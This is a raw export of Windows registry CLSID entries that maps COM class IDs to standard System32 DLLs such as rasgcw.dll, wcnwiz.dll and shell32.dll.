REG_EXPAND_SZ %SystemRoot%\System32\prauthproviders.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8500-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8511-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8512-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8513-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8521-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8522-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8523-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8524-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8531-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8532-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8533-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8534-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8541-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8542-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8551-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8552-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8553-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8554-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8555-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8556-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8557-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8561-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8565-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8566-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8568-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8569-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8571-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8572-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8581-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8582-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8583-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8584-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8585-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8586-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8588-781E-49a1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8591-781E-49A1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03E8592-781E-49A1-8190-CE902D0B2CE7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c047c5a9-c407-4a1e-ad7f-11d0861344b7}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\L2SecHC.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c04b329e-5823-4415-9c93-ba44688947b0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\themeui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C04D65CF-B70D-11D0-B188-00AA0038C969}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mlang.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c08afd90-f2a1-11d1-8455-00a0c91f3880}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c0aa878e-97a5-44df-b7ef-2e732f7b2fec}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\IME\IMETC\applets\imtccac.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C0AA9D93-2EF5-47FB-960C-F90FC644B48E}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\WMIPJOBJ.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C0AB2A0D-F2D2-46E2-9DF9-8885A424C29A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C0B19DEF-9E2A-48cd-B438-26663E22B025}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C0B35746-EBF5-11D8-BBE9-505054503030}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ndproxystub.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C0B4E2F3-BA21-4773-8DBA-335EC946EB8B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\comdlg32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C0BC4B4A-A406-4EFC-932F-B8546B8100CC}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\upnp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C0DCC3A6-BE26-4bad-9833-61DFACE1A8DB} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\netcenter.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C0DCC3A6-BE26-4bad-9833-61DFACE1A8DB}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\netcenter.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C0DCC3A6-BE26-4bad-9833-61DFACE1A8DB}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netcenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C0E13E61-0CC6-11d1-BBB6-0060978B2AE6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DATACLEN.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C0E2E55A-5222-4810-BEA0-6AEF8092A000}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\PackageStateRoaming.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C0EFA91A-EEB7-41C7-97FA-F0ED645EFB24}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BE9A-D33A-4a4b-BF23-BBEF4663D017}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wcnapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BEA3-D33A-4a4b-BF23-BBEF4663D017}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wcnapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BEBB-D33A-4a4b-BF23-BBEF4663D017} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\wcnwiz.dll,-4365 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BEBB-D33A-4a4b-BF23-BBEF4663D017}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wcnwiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BEBC-D33A-4a4b-BF23-BBEF4663D017}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wcnwiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BED0-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wcnwiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BED3-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wcnwiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BED4-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wcnwiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BED7-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wcnwiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BEDA-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wcnwiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BEDB-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wcnwiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BEDC-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wcnwiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BEDD-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wcnwiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BEDE-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wcnwiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BEE1-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wcnwiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BEE2-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wcnwiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BEE3-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wcnwiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BEE5-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wcnwiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BEE9-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wcnwiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BEEA-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wcnwiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BEEB-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BEEC-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wcnwiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BEED-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C100BEEE-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C10B4771-4DA0-11D2-A2F5-00C04F86FB7D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\mofd.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C120DE80-FDE4-49f5-A713-E902EF062B8A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c1243ca0-bf96-11cd-b579-08002b30bfeb}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\query.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C12EC999-9D91-425E-84AF-DC15443A6B81}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobedui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C139C040-532D-451b-80CA-44D1F0839D2A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ntshrui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C17CABB2-D4A3-47D7-A557-339B2EFBD4F1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C196B2BE-BA06-4049-8518-322E1E04282B}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\configmanager2.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C19CBBED-8E33-4B9B-8F00-B044415E8764}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\settingsync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C19FBD0E-7663-44ea-8265-74130671A1D6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C1B22BC2-5EE5-4A3E-BA37-A188922BC827}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\cellulardatacapabilityhandler.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\msimtf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c1f85ef8-bcc2-4606-bb39-70c523715eb3}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sdiagschd.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c206f324-bb45-4765-93ff-3bca7306ff2e}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C22020C6-EEAB-455E-BEC2-A2CC8FDFF976}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobeplugins.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C228A457-53F5-4a76-8035-DF2DA33E76C8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\DxpTaskSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C2303761-3D88-4BA0-9D05-D2C03AE8FC02}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C23FC28D-C55F-4720-8B32-91F73C2BD5D1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C2566514-DD44-4c6c-AAAD-FBD2F18D8DEE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\propsys.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C2745EC3-CF23-4601-92EF-D189B711F933}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppointmentActivation.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c278aba7-cc1c-4717-bdfb-db2bca78246e}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Groupinghc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C2796011-81BA-4148-8FCA-C6643245113F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\pnidui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c27f6b1d-fe0b-45e4-9257-38799fa69bc8}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\usbceip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C2B136E2-D50E-405C-8784-363C582BF43E}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\DeviceCenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c2b94e6d-6ebd-44ee-aac1-eb809c984699}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C2D67532-D0FA-4022-89F7-8C1DF8A0C412}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C2DAE44D-C850-425c-B466-D8CBC1469F5D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\PortableDeviceStatus.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C2E88C2F-6F5B-4AAA-894B-55C847AD3A2D} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\wuapi.dll,-63526 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C2FBB630-2971-11d1-A18C-00C04FD75D13}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C2FBB631-2971-11d1-A18C-00C04FD75D13}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C2FEEEAC-CFCD-11D1-8B05-00600806D9B6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\wbemdisp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c3278e90-bea7-11cd-b579-08002b30bfeb}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\query.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c350f6ad-f45f-45c9-9e62-1f50bb3fc25f}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\frprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C3701884-B39B-11D1-9D68-00C04FC30DF6}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\oleprn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C3701884-B39B-11D1-9D68-00C04FC30DF6}\ToolboxBitmap32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\oleprn.dll, 1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C3A43F75-FE02-47d8-B3EE-0B568C0C5043}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\werconcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C3C39131-B182-4801-B437-6D1E65B72F57}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shacct.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C3E5D3D2-1A03-11CF-942D-008029004347}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sysmon.ocx HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C3E5D3D3-1A03-11CF-942D-008029004347}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sysmon.ocx HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C4050BC4-29E1-4c8f-BF6E-6EBAD21E0673}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\hgcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C40FBD00-88B9-11d2-84AD-00C04FA31A86}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dsquery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C41FF872-07B1-4926-819B-8C94E6B1FBB9}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tscfgwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C424F25A-6774-48BC-9F1E-02CCA8C1BE62}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DiagCpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C439A42A-583F-4609-8C30-E3681E2A0E78}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingMonitor.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C4457F51-993A-4b98-A19B-EC2B4F0DA087}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SrpUxNativeSnapIn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c463a0fc-794f-4fdf-9201-01938ceacafa}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\rasmbmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C47195EC-CD7A-11D1-8EA3-00C04F9900D7}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\cic.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c472004d-44fb-41e9-ac0a-7b920384a850}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\fdprint.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C47A07F6-E6B4-4300-B512-6A95325D6EF8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\usosvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C47A41B7-B729-424f-9AF9-5CB3934F2DFA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WinSATAPI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C4819C8D-9AB8-4B2F-B8AE-C77DABF553D5}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmitimep.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C4D2D8E0-D1DD-11CE-940F-008029004347} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\sysmon.ocx,-144 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C4D2D8E0-D1DD-11CE-940F-008029004347}\AuxUserType\2 LocalizedString REG_EXPAND_SZ @%systemroot%\system32\sysmon.ocx,-144 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C4D2D8E0-D1DD-11CE-940F-008029004347}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sysmon.ocx HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C4EC38BD-4E9E-4b5e-935A-D1BFF237D980}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c51b83e5-9edd-4250-b45a-da672ee3c70e}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C51F0A6B-2A63-4cf4-8938-24404EAEF422}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cscui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C529C7EF-A3AF-45F2-8A47-767B33AA5CC0} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\ndfapi.dll,-40001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C529C7EF-A3AF-45F2-8A47-767B33AA5CC0}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\System32\ndfapi.dll,-500 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C529C7EF-A3AF-45F2-8A47-767B33AA5CC0}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ndfapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C5388469-F816-40D2-9E6B-D6C68986996E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fhcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c57a6066-66a3-4d91-9eb9-41532179f0a5}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-1020 